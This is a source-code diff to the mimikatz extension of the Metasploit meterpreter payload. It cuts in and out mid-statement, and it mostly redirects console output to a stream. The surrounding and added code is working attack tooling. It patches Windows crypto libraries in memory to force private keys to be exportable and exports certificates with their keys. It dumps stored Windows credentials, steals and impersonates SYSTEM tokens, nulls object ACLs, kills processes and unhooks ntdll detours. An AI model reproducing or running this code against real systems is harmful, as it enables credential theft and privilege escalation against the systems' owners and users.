(*outputStream) << L"\\" << monStore << endl; if(HCERTSTORE hCertificateStore = CertOpenStore(CERT_STORE_PROV_SYSTEM, NULL, NULL, systemStore | CERT_STORE_OPEN_EXISTING_FLAG | CERT_STORE_READONLY_FLAG, monStore.c_str())) { DWORD i; @@ -275,7 +275,7 @@ void mod_mimikatz_crypto::listAndOrExportCertificates(vector * argument if(!mod_crypto::getCertNameFromCertCTX(pCertContext, certName)) certName->assign(L"[empty]"); - wcout << L"\t - " << *certName << endl;; + (*outputStream) << L"\t - " << *certName << endl;; sanitizeFileName(certName); wstringstream monBuff; @@ -284,8 +284,8 @@ void mod_mimikatz_crypto::listAndOrExportCertificates(vector * argument mod_crypto::KIWI_KEY_PROV_INFO keyProvInfo; if(mod_crypto::getKiwiKeyProvInfo(pCertContext, &keyProvInfo)) { - wcout << L"\t\tContainer Clé : " << keyProvInfo.pwszContainerName << endl; - wcout << L"\t\tProvider : " << keyProvInfo.pwszProvName << endl; + (*outputStream) << L"\t\tContainer Clé : " << keyProvInfo.pwszContainerName << endl; + (*outputStream) << L"\t\tProvider : " << keyProvInfo.pwszProvName << endl; HCRYPTPROV_OR_NCRYPT_KEY_HANDLE monProv = NULL; DWORD keySpec = 0; @@ -293,7 +293,7 @@ void mod_mimikatz_crypto::listAndOrExportCertificates(vector * argument if(CryptAcquireCertificatePrivateKey(pCertContext, CRYPT_ACQUIRE_ALLOW_NCRYPT_KEY_FLAG /* CRYPT_ACQUIRE_SILENT_FLAG NULL */, NULL, &monProv, &keySpec, &aFermer)) { - wcout << L"\t\tType : " << mod_crypto::KeyTypeToString(keySpec) << endl; + (*outputStream) << L"\t\tType : " << mod_crypto::KeyTypeToString(keySpec) << endl; DWORD size = 0; bool exportable = false; @@ -310,7 +310,7 @@ void mod_mimikatz_crypto::listAndOrExportCertificates(vector * argument mod_cryptong::NCryptFreeObject(monProv); } } - else wcout << L"\t\t\tErreur : Clé de type nCrypt, sans nCrypt ?" << endl; + else (*outputStream) << L"\t\t\tErreur : Clé de type nCrypt, sans nCrypt ?" << endl; } else { @@ -334,8 +334,8 @@ void mod_mimikatz_crypto::listAndOrExportCertificates(vector * argument } if(reussite) { - wcout << L"\t\tExportabilité : " << (exportable ? L"OUI" : L"NON") << endl; - wcout << L"\t\tTaille clé : " << size << endl; + (*outputStream) << L"\t\tExportabilité : " << (exportable ? L"OUI" : L"NON") << endl; + (*outputStream) << L"\t\tTaille clé : " << size << endl; } if(exportCert) @@ -345,14 +345,14 @@ void mod_mimikatz_crypto::listAndOrExportCertificates(vector * argument reussite = mod_crypto::CertCTXtoPFX(pCertContext, PFXFile, L"mimikatz"); - wcout << L"\t\tExport privé dans \'" << PFXFile << L"\' : " << (reussite ? L"OK" : L"KO") << endl; + (*outputStream) << L"\t\tExport privé dans \'" << PFXFile << L"\' : " << (reussite ? L"OK" : L"KO") << endl; if(!reussite) { - wcout << L"\t\t\t" << mod_system::getWinError() << endl; + (*outputStream) << L"\t\t\t" << mod_system::getWinError() << endl; } } } - else wcout << L"CryptAcquireCertificatePrivateKey : " << mod_system::getWinError() << endl; + else (*outputStream) << L"CryptAcquireCertificatePrivateKey : " << mod_system::getWinError() << endl; } if(exportCert) @@ -362,19 +362,19 @@ void mod_mimikatz_crypto::listAndOrExportCertificates(vector * argument reussite = mod_crypto::CertCTXtoDER(pCertContext, DERFile); - wcout << L"\t\tExport public dans \'" << DERFile << L"\' : " << (reussite ? L"OK" : L"KO") << endl; + (*outputStream) << L"\t\tExport public dans \'" << DERFile << L"\' : " << (reussite ? L"OK" : L"KO") << endl; if(!reussite) { - wcout << L"\t\t\t" << mod_system::getWinError() << endl; + (*outputStream) << L"\t\t\t" << mod_system::getWinError() << endl; } } delete certName; } CertCloseStore(hCertificateStore, CERT_CLOSE_STORE_FORCE_FLAG); } - else wcout << L"CertOpenStore : " << mod_system::getWinError() << endl; + else (*outputStream) << L"CertOpenStore : " << mod_system::getWinError() << endl; } - else wcout << L" introuvable !" << endl; + else (*outputStream) << L" introuvable !" << endl; } @@ -460,7 +460,7 @@ bool mod_mimikatz_crypto::patchcapi(vector * arguments) if( mod_memory::genericPatternSearch(&ptr4001, LIBNAME_WALL_RSA, pattern4001, taillePattern4001, offsetPatch4001, FUNCNAM_WALL_EXPORT, true, true) && mod_memory::genericPatternSearch(&ptr4000, LIBNAME_WALL_RSA, pattern4000, taillePattern4000, offsetPatch4000, FUNCNAM_WALL_EXPORT, true, true)) { - wcout << L"Patterns CRYPT_EXPORTABLE | CRYPT_ARCHIVABLE et CRYPT_ARCHIVABLE trouvés !" << endl << + (*outputStream) << L"Patterns CRYPT_EXPORTABLE | CRYPT_ARCHIVABLE et CRYPT_ARCHIVABLE trouvés !" << endl << L"Patch CRYPT_EXPORTABLE | CRYPT_ARCHIVABLE : " << (mod_memory::writeMemory(ptr4001, patch4001, taillePatch4001) ? L"OK" : L"KO") << endl << L"Patch CRYPT_ARCHIVABLE : " << (mod_memory::writeMemory(ptr4000, patch4000, taillePatch4000) ? L"OK" : L"KO") << endl; } @@ -569,9 +569,9 @@ bool mod_mimikatz_crypto::patchcng(vector * arguments) mod_patch::patchModuleOfService(L"KeyIso", libName, pattern, taillePattern, patch, taillePatch, offsetPatch); } - else wcout << L"Impossible d\'initialiser la CNG : " << mod_system::getWinError() << endl; + else (*outputStream) << L"Impossible d\'initialiser la CNG : " << mod_system::getWinError() << endl; } - else wcout << L"Pas de CNG ?" << endl; + else (*outputStream) << L"Pas de CNG ?" << endl; return true; } diff --git a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_divers.cpp b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_divers.cpp index af50f17c..d17345ad 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_divers.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_divers.cpp @@ -34,15 +34,15 @@ bool mod_mimikatz_divers::nodetour(vector * arguments) PBYTE monNTDLLptr = reinterpret_cast(GetProcAddress(GetModuleHandle(L"ntdll"), "NtOpenProcess")); if(memcmp(monNTDLLptr + 8, monDetouredStub, sizeof(monDetouredStub)) == 0) { - wcout << L"Détour trouvé et "; + (*outputStream) << L"Détour trouvé et "; if(mod_memory::writeMemory(monNTDLLptr + 8 + sizeof(monDetouredStub) + sizeof(LONG) + *reinterpret_cast(monNTDLLptr + 8 + sizeof(monDetouredStub)), monSysEnterRetn, sizeof(monSysEnterRetn))) - wcout << L"patché :)"; + (*outputStream) << L"patché :)"; else - wcout << L"NON patché :("; - wcout << endl; + (*outputStream) << L"NON patché :("; + (*outputStream) << endl; } else - wcout << L"Détour non trouvé" << endl; + (*outputStream) << L"Détour non trouvé" << endl; } return true; } @@ -176,7 +176,7 @@ bool mod_mimikatz_divers::secrets(vector * arguments) if(CredEnumerate(NULL, flags, &credNb, &pCredential)) { - wcout << L"Nombre de secrets : " << credNb << endl; + (*outputStream) << L"Nombre de secrets : " << credNb << endl; for(DWORD i = 0; i < credNb; i++) { @@ -208,7 +208,7 @@ bool mod_mimikatz_divers::secrets(vector * arguments) type.assign(L"?"); } - wcout << + (*outputStream) << L"TargetName : " << pCredential[i]->TargetName << L" / " << (pCredential[i]->TargetAlias ? pCredential[i]->TargetAlias : L"") << endl << L"Type : " << type << L" (" << pCredential[i]->Type << L')' << endl << L"Comment : " << (pCredential[i]->Comment ? pCredential[i]->Comment : L"") << endl << @@ -218,7 +218,7 @@ bool mod_mimikatz_divers::secrets(vector * arguments) } CredFree(pCredential); } - else wcout << L"CredEnumerate : " << mod_system::getWinError() << endl; + else (*outputStream) << L"CredEnumerate : " << mod_system::getWinError() << endl; return true; } @@ -253,11 +253,11 @@ bool mod_mimikatz_divers::pitme(vector * arguments) if(arguments->size() < 1) { - wcout << L"divers:::pitme file.pit [file.rdp]" << endl; + (*outputStream) << L"divers:::pitme file.pit [file.rdp]" << endl; } else { - wcout << L" * Ouverture en lecture du fichier \'" << arguments->front() << L"\' : "; + (*outputStream) << L" * Ouverture en lecture du fichier \'" << arguments->front() << L"\' : "; if(monFichierSource = _wfopen(arguments->front().c_str(), L"rb")) { fseek(monFichierSource, 0, SEEK_END); @@ -267,40 +267,40 @@ bool mod_mimikatz_divers::pitme(vector * arguments) fread(monBuffer, tailleFichierSource, 1, monFichierSource); fclose(monFichierSource); - wcout << L"OK" << endl << L" * Déchiffrement n°1 : "; + (*outputStream) << L"OK" << endl << L" * Déchiffrement n°1 : "; if(mod_crypto::genericDecrypt(monBuffer, tailleFichierSource, HARDCODED_KEY, sizeof(HARDCODED_KEY), CALG_RC4)) { - wcout << L"OK" << endl << L" * Déchiffrement n°2 : "; + (*outputStream) << L"OK" << endl << L" * Déchiffrement n°2 : "; if(mod_crypto::genericDecrypt(monBuffer, tailleFichierSource - SUBKEY_SIZE, monBuffer + tailleFichierSource - SUBKEY_SIZE, SUBKEY_SIZE, CALG_RC4)) { - wcout << L"OK" << endl << L" * En-tête : "; + (*outputStream) << L"OK" << endl << L" * En-tête : "; if(memcmp(monBuffer, HEADER_PIT, sizeof(HEADER_PIT)) == 0) { - wcout << L"OK" << endl; + (*outputStream) << L"OK" << endl; monBufferData = monBuffer + sizeof(HEADER_PIT); tailleData = tailleFichierSource - sizeof(HEADER_PIT) - SUBKEY_SIZE; if(arguments->size() > 1) { - wcout << L" * Ouverture en écriture du fichier \'" << arguments->back() << L"\' : "; + (*outputStream) << L" * Ouverture en écriture du fichier \'" << arguments->back() << L"\' : "; if(monFichierDestination = _wfopen(arguments->back().c_str(), L"wb")) { - wcout << L"OK" << endl; + (*outputStream) << L"OK" << endl; fwrite(monBufferData, tailleData, 1, monFichierDestination); fclose(monFichierDestination); } - else wcout << L"KO" << endl; + else (*outputStream) << L"KO" << endl; } - else wcout << L" * Données : " << endl << endl << wstring(reinterpret_cast(monBufferData), reinterpret_cast(monBufferData + tailleData)) << endl; + else (*outputStream) << L" * Données : " << endl << endl << wstring(reinterpret_cast(monBufferData), reinterpret_cast(monBufferData + tailleData)) << endl; } - else wcout << L"KO - différent de \'PIT\' ; " << mod_text::stringOfHex(HEADER_PIT, sizeof(HEADER_PIT)) << L" != " << mod_text::stringOfHex(monBuffer, sizeof(HEADER_PIT)) << endl; + else (*outputStream) << L"KO - différent de \'PIT\' ; " << mod_text::stringOfHex(HEADER_PIT, sizeof(HEADER_PIT)) << L" != " << mod_text::stringOfHex(monBuffer, sizeof(HEADER_PIT)) << endl; } - else wcout << L"KO"; + else (*outputStream) << L"KO"; } - else wcout << L"KO"; + else (*outputStream) << L"KO"; delete [] monBuffer; } - else wcout << L"KO" << endl; + else (*outputStream) << L"KO" << endl; } return true; } \ No newline at end of file diff --git a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_efs.cpp b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_efs.cpp index 97d0bf10..c38d2091 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_efs.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_efs.cpp @@ -23,19 +23,19 @@ bool mod_mimikatz_efs::infos(vector * arguments) if(QueryUsersOnEncryptedFile(arguments->front().c_str(), &pHashes) == ERROR_SUCCESS) { - wcout << L"Utilisateur(s) déclaré(s) : " << pHashes->nCert_Hash << endl; + (*outputStream) << L"Utilisateur(s) déclaré(s) : " << pHashes->nCert_Hash << endl; printInfos(pHashes); FreeEncryptionCertificateHashList(pHashes); } - else wcout << L"Erreur QueryUsersOnEncryptedFile : " << mod_system::getWinError() << endl; + else (*outputStream) << L"Erreur QueryUsersOnEncryptedFile : " << mod_system::getWinError() << endl; if(QueryRecoveryAgentsOnEncryptedFile(arguments->front().c_str(), &pHashes) == ERROR_SUCCESS) { - wcout << L"Agent(s) de recouvrement : " << pHashes->nCert_Hash << endl; + (*outputStream) << L"Agent(s) de recouvrement : " << pHashes->nCert_Hash << endl; printInfos(pHashes); FreeEncryptionCertificateHashList(pHashes); } - else wcout << L"Erreur QueryRecoveryAgentsOnEncryptedFile : " << mod_system::getWinError() << endl; + else (*outputStream) << L"Erreur QueryRecoveryAgentsOnEncryptedFile : " << mod_system::getWinError() << endl; } return true; @@ -62,7 +62,7 @@ bool mod_mimikatz_efs::full(vector * arguments) bool isEFSMetaData = (monMarshaledStream->NameLenght == 2) && (monMarshaledStream->StreamName[0] == 0x1910); - wcout << endl << + (*outputStream) << endl << L"Marshaled Stream :" << endl << L" * Taille : " << monMarshaledStream->Length << endl << L" * Flag : " << monMarshaledStream->Flag << endl << @@ -77,34 +77,34 @@ bool mod_mimikatz_efs::full(vector * arguments) ) { - wcout << L"DataSegment : " << endl; + (*outputStream) << L"DataSegment : " << endl; PBYTE StreamData = reinterpret_cast(monDataSegment) + sizeof(EFS_STREAM_DATA_SEGMENT); if(isEFSMetaData) { - wcout << L" EFS Metadata :" << endl; + (*outputStream) << L" EFS Metadata :" << endl; PEFS_METADATA_1 mesAttr = reinterpret_cast(StreamData); - wcout << L" * Version EFS : " << mesAttr->EFS_Version << endl; + (*outputStream) << L" * Version EFS : " << mesAttr->EFS_Version << endl; if(mesAttr->DDF_Offset) { - wcout << L" * Utilisateur(s) déclaré(s) :" << endl; + (*outputStream) << L" * Utilisateur(s) déclaré(s) :" << endl; fullInfosFromEFS_KEY_LIST(mesAttr, mesAttr->DDF_Offset, &Fek); } if(mesAttr->DRF_Offset) { - wcout << L" * Agent(s) de recouvrement :" << endl; + (*outputStream) << L" * Agent(s) de recouvrement :" << endl; fullInfosFromEFS_KEY_LIST(mesAttr, mesAttr->DRF_Offset, &Fek); } } else { - wcout << L" DATA :" << endl; + (*outputStream) << L" DATA :" << endl; if(!monMarshaledStream->Flag) { - wcout << L" DATA Segment Encryption Header :" << endl; + (*outputStream) << L" DATA Segment Encryption Header :" << endl; PEFS_STREAM_DATA_SEGMENT_ENCRYPTION_HEADER monSegEncHead = reinterpret_cast(StreamData); - wcout << + (*outputStream) << L" * Length : " << monSegEncHead->Length << endl << L" * StartingFile_Offset : " << monSegEncHead->StartingFile_Offset << endl << L" * BytesWithinStreamSize : " << monSegEncHead->BytesWithinStreamSize << endl << @@ -118,33 +118,33 @@ bool mod_mimikatz_efs::full(vector * arguments) PEFS_EXTENDED_HEADER monExtHeader = reinterpret_cast(reinterpret_cast(monSegEncHead) + FIELD_OFFSET(EFS_STREAM_DATA_SEGMENT_ENCRYPTION_HEADER, DataBlockSizes) + (sizeof(DWORD) * monSegEncHead->NumberOfDataBlocks)); if(monExtHeader->EXTD_Number == 'DTXE') { - wcout << L" * Extended Header Flag : " << monExtHeader->Flags << endl; + (*outputStream) << L" * Extended Header Flag : " << monExtHeader->Flags << endl; } for(DWORD block = 0; block < monSegEncHead->NumberOfDataBlocks; block++) { - wcout << L" -> Block " << block+1 << L" ; taille : " << monSegEncHead->DataBlockSizes[block] << endl; + (*outputStream) << L" -> Block " << block+1 << L" ; taille : " << monSegEncHead->DataBlockSizes[block] << endl; PBYTE mesDatas = reinterpret_cast(StreamData) + monSegEncHead->Length; - wcout << mod_text::stringOfHex(mesDatas, monSegEncHead->DataBlockSizes[block], 16) << endl; + (*outputStream) << mod_text::stringOfHex(mesDatas, monSegEncHead->DataBlockSizes[block], 16) << endl; if(Fek); } } else { - wcout << L"TODO Data" << endl; + (*outputStream) << L"TODO Data" << endl; } } } } } - else wcout << L"Erreur ReadEncryptedFileRaw : " << mod_system::getWinError() << endl; + else (*outputStream) << L"Erreur ReadEncryptedFileRaw : " << mod_system::getWinError() << endl; free(sba.tableau); CloseEncryptedFileRaw(pvContext); } - else wcout << L"Erreur OpenEncryptedFileRaw : " << mod_system::getWinError() << endl; + else (*outputStream) << L"Erreur OpenEncryptedFileRaw : " << mod_system::getWinError() << endl; } return true; } @@ -154,20 +154,20 @@ bool mod_mimikatz_efs::toraw(vector * arguments) if(arguments->size() == 2) { PVOID pvContext = NULL; - wcout << L"Ouverture de : " << arguments->front() << endl; + (*outputStream) << L"Ouverture de : " << arguments->front() << endl; if(OpenEncryptedFileRaw(arguments->front().c_str(), 0, &pvContext) == ERROR_SUCCESS) { - wcout << L"Vers : " << arguments->back() << endl; + (*outputStream) << L"Vers : " << arguments->back() << endl; HANDLE hFile = CreateFile(arguments->back().c_str(), GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); if(ReadEncryptedFileRaw(ExportToFileCallback, &hFile, pvContext) == ERROR_SUCCESS) { - wcout << L" * Export OK" << endl; + (*outputStream) << L" * Export OK" << endl; } - else wcout << L"* Erreur ReadEncryptedFileRaw : " << mod_system::getWinError() << endl; + else (*outputStream) << L"* Erreur ReadEncryptedFileRaw : " << mod_system::getWinError() << endl; CloseHandle(hFile); CloseEncryptedFileRaw(pvContext); } - else wcout << L"Erreur OpenEncryptedFileRaw : " << mod_system::getWinError() << endl; + else (*outputStream) << L"Erreur OpenEncryptedFileRaw : " << mod_system::getWinError() << endl; } return true; } @@ -179,7 +179,7 @@ void mod_mimikatz_efs::printInfos(PENCRYPTION_CERTIFICATE_HASH_LIST hashList) wstring user; mod_secacl::simpleSidToString(hashList->pUsers[i]->pUserSid, &user); - wcout << + (*outputStream) << L" * Nom : " << user << endl << L" * Nom simple : " << hashList->pUsers[i]->lpDisplayInformation << endl << L" * Hash du certificat : " << mod_text::stringOfHex(hashList->pUsers[i]->pHash->pbData, hashList->pUsers[i]->pHash->cbData) << endl << @@ -208,7 +208,7 @@ DWORD WINAPI mod_mimikatz_efs::ExportToFileCallback(PBYTE pbData, PVOID pvCallba { if(ulLength) { - wcout << L" - Lecture d\'un bloc de : " << ulLength << endl; + (*outputStream) << L" - Lecture d\'un bloc de : " << ulLength << endl; DWORD dwBytesWritten = 0; if(WriteFile(*reinterpret_cast(pvCallbackContext), pbData, ulLength, &dwBytesWritten, NULL) && (ulLength == dwBytesWritten)) return ERROR_SUCCESS; @@ -226,7 +226,7 @@ bool mod_mimikatz_efs::fullInfosFromEFS_KEY_LIST(PEFS_METADATA_1 header, LONG Ke DWORD previousSize = sizeof(PEFS_KEY_LIST); for(DWORD i = 0; i < monHead->Length; i++) { - wcout << endl << L" Champ de données " << (i + 1) << L" :" << endl; + (*outputStream) << endl << L" Champ de données " << (i + 1) << L" :" << endl; monHeader = reinterpret_cast((PBYTE) monHeader + previousSize); PEFS_PUBLIC_KEY_INFORMATION monCredHeader = reinterpret_cast(reinterpret_cast(monHeader) + monHeader->PKI_Offset); @@ -235,11 +235,11 @@ bool mod_mimikatz_efs::fullInfosFromEFS_KEY_LIST(PEFS_METADATA_1 header, LONG Ke mod_secacl::simpleSidToString((reinterpret_cast(monCredHeader) + monCredHeader->OwnerSID_offset), &user); else user.assign(L"(null)"); - wcout << L" * Utilisateur : " << user << endl; + (*outputStream) << L" * Utilisateur : " << user << endl; fullInfosFromEFS_CERTIFICATE_DATA(monCredHeader, monCredHeader->Certificate_offset); PBYTE Encrypted_FEK = reinterpret_cast(monHeader) + monHeader->Enc_FEK_Offset; - wcout << + (*outputStream) << L" * Flags : " << monHeader->Flags << endl << L" * FEK (chiffrée) : " << endl << L" -> Taille : " << monHeader->Enc_FEK_Length << endl << @@ -256,7 +256,7 @@ bool mod_mimikatz_efs::fullInfosFromEFS_KEY_LIST(PEFS_METADATA_1 header, LONG Ke if (CryptDecrypt(maCle, 0, TRUE, 0, Encrypted_FEK, &taille) ) { *pFek = reinterpret_cast(Encrypted_FEK); - wcout << + (*outputStream) << L" * FEK (clair) : " << endl << L" -> Taille : " << (*pFek)->Key_Lenght << endl << L" -> Algorithme : " << (*pFek)->Algorithm << endl << @@ -265,7 +265,7 @@ bool mod_mimikatz_efs::fullInfosFromEFS_KEY_LIST(PEFS_METADATA_1 header, LONG Ke endl; } else - wcout << mod_system::getWinError() << endl; + (*outputStream) << mod_system::getWinError() << endl; } CryptReleaseContext(hCryptKeyProv, 0); }*/ @@ -280,20 +280,20 @@ void mod_mimikatz_efs::fullInfosFromEFS_CERTIFICATE_DATA(PEFS_PUBLIC_KEY_INFORMA { PEFS_CERTIFICATE_DATA monThCertificate = reinterpret_cast(reinterpret_cast(header) + header->Certificate_offset); - wcout << L" -> Nom affiché : "; + (*outputStream) << L" -> Nom affiché : "; if(monThCertificate->DisplayName_Offset) - wcout << reinterpret_cast(reinterpret_cast(monThCertificate) + monThCertificate->DisplayName_Offset); - wcout << endl; + (*outputStream) << reinterpret_cast(reinterpret_cast(monThCertificate) + monThCertificate->DisplayName_Offset); + (*outputStream) << endl; - wcout << L" -> Provider : "; + (*outputStream) << L" -> Provider : "; if(monThCertificate->ProviderName_Offset) - wcout << reinterpret_cast(reinterpret_cast(monThCertificate) + monThCertificate->ProviderName_Offset); - wcout << endl; + (*outputStream) << reinterpret_cast(reinterpret_cast(monThCertificate) + monThCertificate->ProviderName_Offset); + (*outputStream) << endl; - wcout << L" -> Container : "; + (*outputStream) << L" -> Container : "; if(monThCertificate->ContainerName_Offset) - wcout << reinterpret_cast(reinterpret_cast(monThCertificate) + monThCertificate->ContainerName_Offset); - wcout << endl; + (*outputStream) << reinterpret_cast(reinterpret_cast(monThCertificate) + monThCertificate->ContainerName_Offset); + (*outputStream) << endl; - wcout << L" -> Empreinte : " << mod_text::stringOfHex(reinterpret_cast(monThCertificate) + monThCertificate->CertificateThumbprint, monThCertificate->CertificateThumbprint_Length) << endl; + (*outputStream) << L" -> Empreinte : " << mod_text::stringOfHex(reinterpret_cast(monThCertificate) + monThCertificate->CertificateThumbprint, monThCertificate->CertificateThumbprint_Length) << endl; } diff --git a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_handle.cpp b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_handle.cpp index 5a5ae4d1..6a18b70d 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_handle.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_handle.cpp @@ -42,39 +42,39 @@ bool mod_mimikatz_handle::list(vector * arguments) if(isToken || isProcess) { - wcout << setw(5) << setfill(wchar_t(' ')) << monHandle->ProcessId << L" "; + (*outputStream) << setw(5) << setfill(wchar_t(' ')) << monHandle->ProcessId << L" "; if(isProcessList) { mod_process::KIWI_PROCESSENTRY32 * processHote = new mod_process::KIWI_PROCESSENTRY32(); if(mod_process::getProcessEntryFromProcessId(monHandle->ProcessId, processHote, mesProcess)) - wcout << setw(25) << setfill(wchar_t(' ')) << left << processHote->szExeFile << right; + (*outputStream) << setw(25) << setfill(wchar_t(' ')) << left << processHote->szExeFile << right; delete processHote; } - wcout << L" -> " << setw(5) << setfill(wchar_t(' ')) << monHandle->Handle << L'\t' << tokenType << L'\t'; + (*outputStream) << L" -> " << setw(5) << setfill(wchar_t(' ')) << monHandle->Handle << L'\t' << tokenType << L'\t'; if(isToken) { wstring userName, domainName; if(mod_secacl::tokenUser(nouveauHandle, &userName, &domainName)) - wcout << L'\t' << domainName << L'\\' << userName ; - else wcout << mod_system::getWinError(); + (*outputStream) << L'\t' << domainName << L'\\' << userName ; + else (*outputStream) << mod_system::getWinError(); } else if(isProcess) { DWORD monPid = GetProcessId(nouveauHandle); - wcout << monPid; + (*outputStream) << monPid; if(isProcessList) { mod_process::KIWI_PROCESSENTRY32 * processKiwi = new mod_process::KIWI_PROCESSENTRY32(); if(mod_process::getProcessEntryFromProcessId(monPid, processKiwi, mesProcess)) - wcout << L'\t' << processKiwi->szExeFile; + (*outputStream) << L'\t' << processKiwi->szExeFile; delete processKiwi; } } - wcout << endl; + (*outputStream) << endl; } } CloseHandle(nouveauHandle); @@ -83,7 +83,7 @@ bool mod_mimikatz_handle::list(vector * arguments) } } } - else wcout << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl; delete mesHandles; @@ -127,7 +127,7 @@ bool mod_mimikatz_handle::processStop(vector * arguments) { if(_wcsicmp(processKiwi->szExeFile.c_str(), monProcessName->c_str()) == 0) { - wcout << + (*outputStream) << setw(5) << setfill(wchar_t(' ')) << monHandle->ProcessId << L" " << setw(25) << setfill(wchar_t(' ')) << left << processHote->szExeFile << right << L" -> " << setw(5) << setfill(wchar_t(' ')) << monHandle->Handle << L'\t' << @@ -135,34 +135,34 @@ bool mod_mimikatz_handle::processStop(vector * arguments) ; - wcout << L"\tTerminate Process - "; + (*outputStream) << L"\tTerminate Process - "; if(TerminateProcess(nouveauHandle, ERROR_SUCCESS) != 0) { - wcout << L"OK"; + (*outputStream) << L"OK"; } else { - wcout << L"KO ; " << mod_system::getWinError() << endl << + (*outputStream) << L"KO ; " << mod_system::getWinError() << endl << L"\tJob : "; if(HANDLE monObject = CreateJobObject(NULL, NULL)) { if(AssignProcessToJobObject(monObject, nouveauHandle)) { - wcout << L"TerminateJobObject - "; + (*outputStream) << L"TerminateJobObject - "; if(TerminateJobObject(monObject, ERROR_SUCCESS) != 0) { - wcout << L"OK"; + (*outputStream) << L"OK"; } - else wcout << L"KO ; " << mod_system::getWinError(); + else (*outputStream) << L"KO ; " << mod_system::getWinError(); } - else wcout << L"AssignProcessToJobObject - KO ; " << mod_system::getWinError(); + else (*outputStream) << L"AssignProcessToJobObject - KO ; " << mod_system::getWinError(); CloseHandle(monObject); } } - wcout << endl; + (*outputStream) << endl; } } } @@ -177,7 +177,7 @@ bool mod_mimikatz_handle::processStop(vector * arguments) } } } - else wcout << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl; delete mesHandles; @@ -219,7 +219,7 @@ bool mod_mimikatz_handle::tokenImpersonate(vector * arguments) { if(_wcsicmp(userName.c_str(), (arguments->empty() ? L"system" : arguments->front().c_str())) == 0) { - wcout << + (*outputStream) << setw(5) << setfill(wchar_t(' ')) << monHandle->ProcessId << L" " << setw(25) << setfill(wchar_t(' ')) << left << processHote->szExeFile << right << L" -> " << setw(5) << setfill(wchar_t(' ')) << monHandle->Handle << L'\t' << @@ -229,22 +229,22 @@ bool mod_mimikatz_handle::tokenImpersonate(vector * arguments) { if(ImpersonateLoggedOnUser(nouveauHandle)) { - wcout << L"ok !!" << endl; + (*outputStream) << L"ok !!" << endl; break; } else { - wcout << L"ko - ImpersonateLoggedOnUser ; " << mod_system::getWinError() << endl; + (*outputStream) << L"ko - ImpersonateLoggedOnUser ; " << mod_system::getWinError() << endl; } } else { - wcout << L"ko - mod_secacl::exchangeDupToken ; " << mod_system::getWinError() << endl; + (*outputStream) << L"ko - mod_secacl::exchangeDupToken ; " << mod_system::getWinError() << endl; } } } - else wcout << mod_system::getWinError(); + else (*outputStream) << mod_system::getWinError(); } delete processHote; } @@ -256,7 +256,7 @@ bool mod_mimikatz_handle::tokenImpersonate(vector * arguments) } } } - else wcout << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl; delete mesHandles; @@ -284,7 +284,7 @@ bool mod_mimikatz_handle::nullAcl(vector * arguments) toACL = find(arguments->begin(), arguments->end(), tokenType) != arguments->end(); if(toACL) - wcout << monHandle->ProcessId << L'\t' << monHandle->Handle << L'\t' << tokenType << L"\t\t" << (mod_secacl::nullSdToHandle(&nouveauHandle) ? L"NULL !" : L"KO") << endl; + (*outputStream) << monHandle->ProcessId << L'\t' << monHandle->Handle << L'\t' << tokenType << L"\t\t" << (mod_secacl::nullSdToHandle(&nouveauHandle) ? L"NULL !" : L"KO") << endl; } CloseHandle(nouveauHandle); } @@ -292,7 +292,7 @@ bool mod_mimikatz_handle::nullAcl(vector * arguments) } } } - else wcout << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl; delete mesHandles; diff --git a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_hash.cpp b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_hash.cpp index 8b477364..0579ef33 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_hash.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_hash.cpp @@ -21,9 +21,9 @@ bool mod_mimikatz_hash::lm(vector * arguments) chaine = arguments->front(); if(mod_hash::lm(&chaine, &hash)) - wcout << L"LM(\'" << chaine << L"\') = " << hash << endl; + (*outputStream) << L"LM(\'" << chaine << L"\') = " << hash << endl; else - wcout << L"Erreur de calcul du hash LM" << endl; + (*outputStream) << L"Erreur de calcul du hash LM" << endl; return true; } @@ -35,8 +35,8 @@ bool mod_mimikatz_hash::ntlm(vector * arguments) chaine = arguments->front(); if(mod_hash::ntlm(&chaine, &hash)) - wcout << L"NTLM(\'" << chaine << L"\') = " << hash << endl; + (*outputStream) << L"NTLM(\'" << chaine << L"\') = " << hash << endl; else - wcout << L"Erreur de calcul du hash NTLM" << endl; + (*outputStream) << L"Erreur de calcul du hash NTLM" << endl; return true; } diff --git a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_impersonate.cpp b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_impersonate.cpp index e8c42208..ad3079f3 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_impersonate.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_impersonate.cpp @@ -13,12 +13,12 @@ vector mod_mimikatz_impersonate::getMimiKatz } bool mod_mimikatz_impersonate::revert(vector * arguments) { - wcout << L"RevertToSelf : "; + (*outputStream) << L"RevertToSelf : "; if(RevertToSelf()) - wcout << L"ok"; + (*outputStream) << L"ok"; else - wcout << L"ko ; " << 